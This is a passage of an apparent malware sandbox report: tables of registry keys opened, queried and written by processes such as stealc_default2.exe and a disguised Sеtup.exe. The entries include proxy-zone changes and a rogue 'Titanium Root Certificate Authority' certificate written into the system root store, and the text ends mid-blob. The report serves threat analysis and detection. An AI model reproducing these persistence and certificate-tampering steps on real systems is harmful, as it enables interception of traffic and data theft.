| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\gpupdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\gpupdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\DZo08TTbLE.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\filename.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\gpupdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000026001\joffer2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000026001\joffer2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1" | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Roaming\EzUlZHXCL1.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Roaming\EzUlZHXCL1.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 190000000100000010000000dbd91ea86008fd8536f2b37529666c7b0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079000000140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d323330333